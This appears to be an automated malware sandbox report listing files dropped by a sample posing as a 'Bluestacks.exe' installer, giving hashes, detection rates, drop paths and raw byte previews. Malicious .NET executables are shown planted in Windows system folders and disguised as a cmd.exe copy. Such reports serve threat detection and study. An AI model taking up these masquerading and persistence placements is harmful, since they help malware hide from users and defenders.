SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2vrf220.tb0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vdspqljp.fk5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vexfnn2e.ifz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vx4pwoao.qwq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzdgjrop.eea.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsyt5j2f.org.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjv0mzzn.k4n.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xpwfqgge.hbi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwilxpk3.ba0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykvuq5ue.iet.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yv0b51uz.4ya.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zawxzwvw.50o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxm2rua.tsk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\Desktop\BlUGSVrR.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: OneDriveStandaloneUpdater.exe, Detection: malicious, Browse Filename: Udzp7lL5ns.exe, Detection: malicious, Browse Filename: eP6sjvTqJa.exe, Detection: malicious, Browse Filename: YGk3y6Tdix.exe, Detection: malicious, Browse Filename: Etqq32Yuw4.exe, Detection: malicious, Browse Filename: qNdO4D18CF.exe, Detection: malicious, Browse Filename: LzmJLVB41K.exe, Detection: malicious, Browse Filename: k1iZHyRK6K.exe, Detection: malicious, Browse Filename: PbfYaIvR5B.exe, Detection: malicious, Browse Filename: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\DvqGSnXS.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EbKwZRsK.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\TxvLlrMg.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.4346552043530165
Encrypted:	false
SSDEEP:
MD5:	1DCDE09C6A8CE8F5179FB24D0C5A740D
SHA1:	1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
SHA-256:	1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
SHA-512:	5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 6%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VHSMlJrg.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mPirFwXv.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rCAqismj.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uAazTYNi.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wxCHpYcd.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Windows\BitLockerDiscoveryVolumeContents\ad448380f74670

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	ASCII text, with very long lines (607), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.880315306333281
Encrypted:	false
SSDEEP:
MD5:	3C4E33EABB0B50079F45809014C16F12
SHA1:	19BC594BA1D4EF89A63E9077BF8C029F9E0FA48C
SHA-256:	B05D971FB0503E1DB45A5599168A5DF8017D48268643E6E11EE2200616D0ABB2
SHA-512:	2666B0ECE6882641B0A48A82C117EC21707E1E9CB2C9EE1CE0FD61CE61AD1D50DDF5CD501773AC2DDDD30157FAA10328E92B64BEACBC530F83DA91AA2F0E2FF0
Malicious:	false
Preview:	iUJWqL98PQlhkQDrsI6kUi2w60uIT1Ucw2KHRoekd6l3OKWXGwJmIaQAbXZ0a0pX5JvrF5aDnVHY69hwdXCgsrUVmKq4OoJmQO7FZoRKWG8wT2Db0nWDyJpNyZF5Pgy9MeHsCbWzG1KlshCtHODlRGxHitR9iV40R9kyvUZYQh679DeRXWyBcNrGqAKSKXQu6TUt7N8wypUuJ0IeO9mMh3XERdIuKGO3QLAptvUKXBNx27601pDKuDND6PbdFNmraad7zcvdpcygqkLUhR2eDDJM86tdU1EJYfWce8AZ4kfROrXVEH6xUHoXRQ92tRJyXpHKOt0iQdkch18RjXZM4RzR08LN9Hpmar4jkMHVQYg0gL0ZSsTV263GzzTPhmiJy8Bz7YrWQD5gu8upIv5RyTueyxuu31xozXCiJAc4B6FyAWV1FoHwqRVeOhBJn6dYQRrX5LfHSBQ1O5ebb2oOuA8hBiUm9TQEdqitp863IAeoBdPSDjrvSOoPSJVW13H9vMYhXuwd6vGugTghTBjalewOCSagmjBP2f3yFs5SxOzgI4t9mxD0UrXQaJfEUQ0Wt01AZrclFQmXpPFIia3zfL5KHnY5M08

C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	150484992
Entropy (8bit):	0.19755066131239787
Encrypted:	false
SSDEEP:
MD5:	E18151C31580AA91CEB01099DE4277B2
SHA1:	979C02265019C77ADA5578B1CFC1A98A65F5F095
SHA-256:	2A01AA8E358B9A949A198CA22EA8FA189990D3004467E600136142D7D97E3D08
SHA-512:	C7CEAE4B46C186C8F36ACA7B6334E116BD42E9A164CCF382F4F29298CAC4790BA1BEA7E90DDB738A6DE925890202BFE65D606A83C9C13665701CA9C712DC915A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.................$ ..........B .. ...` ...@.. ........................ ...........@..................................B .K....` . ..................... ...................................................... ............... ..H............text...." .. ...$ ................. ..`.rsrc... ....` ......& .............@....reloc........ ......* .............@..B.................B .....H.......T...................S...B ......................................0..........(.... ........8........E...............N...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ........8........0..Q....... ........8........E....)...........r.......M.......8$...8.... ....~....{}...:....& ....8....8.... ....~....{o...9....& ....8.......... ....~....{k...:x...& ....8m...~....(_... .... .... ....s....~....(c....... ....~....{p...:-...& ....8"...

C:\Windows\Microsoft.NET\ad448380f74670

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.779422007295367
Encrypted:	false
SSDEEP:
MD5:	B5408A1765DC7A02363164A6A5F7CE5E
SHA1:	275CA349DA646456CEEB5B3DF182B864516DB3CE
SHA-256:	8DBF8B9D8508ADAF05A175CFC78F6FD760DAB6BFF515890D8E71F1149AD9AFBC
SHA-512:	33C55DDFC17A6C9EDA935DCEF9F6A336276AEDB89B8581B0C33018353A744C0CE33B89680F467A65D1EC21A61D29F05ECCB32C5C0608E23A6E578BC8A02EE2E9
Malicious:	false
Preview:	hDj008mSenK784cBo5OwN4RAo9RgN9qHpUHb7QFGX4HZB8lTdaD4ypEnvjM0qGFf7CSowADYzHZSw28qY8Dw5wT9QdqYDPaRzmb9p7gcWpEqQv03kgcrCSjLtSXSUpUkrIdJa9AackaQrmtemxxgwsOgDQPWjNIrUe9ISrclgBPc2TdGj2qh1xx936GKtn1Ocs5MnkM5UMAvcvouwIxqhk0gr9OWkS22KA9JXQd8quMpxCgHSWXl0Kr12YfnV0UCTIlbweWfpyAwYKtpdGEO5RCATIQ8v

C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	150484992
Entropy (8bit):	0.19755066131239787
Encrypted:	false
SSDEEP:
MD5:	E18151C31580AA91CEB01099DE4277B2
SHA1:	979C02265019C77ADA5578B1CFC1A98A65F5F095
SHA-256:	2A01AA8E358B9A949A198CA22EA8FA189990D3004467E600136142D7D97E3D08
SHA-512:	C7CEAE4B46C186C8F36ACA7B6334E116BD42E9A164CCF382F4F29298CAC4790BA1BEA7E90DDB738A6DE925890202BFE65D606A83C9C13665701CA9C712DC915A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.................$ ..........B .. ...` ...@.. ........................ ...........@..................................B .K....` . ..................... ...................................................... ............... ..H............text...." .. ...$ ................. ..`.rsrc... ....` ......& .............@....reloc........ ......* .............@..B.................B .....H.......T...................S...B ......................................0..........(.... ........8........E...............N...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ........8........0..Q....... ........8........E....)...........r.......M.......8$...8.... ....~....{}...:....& ....8....8.... ....~....{o...9....& ....8.......... ....~....{k...:x...& ....8m...~....(_... .... .... ....s....~....(c....... ....~....{p...:-...& ....8"...

C:\Windows\ShellComponents\cmd.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	150484992
Entropy (8bit):	0.19755066131239787
Encrypted:	false
SSDEEP:
MD5:	E18151C31580AA91CEB01099DE4277B2
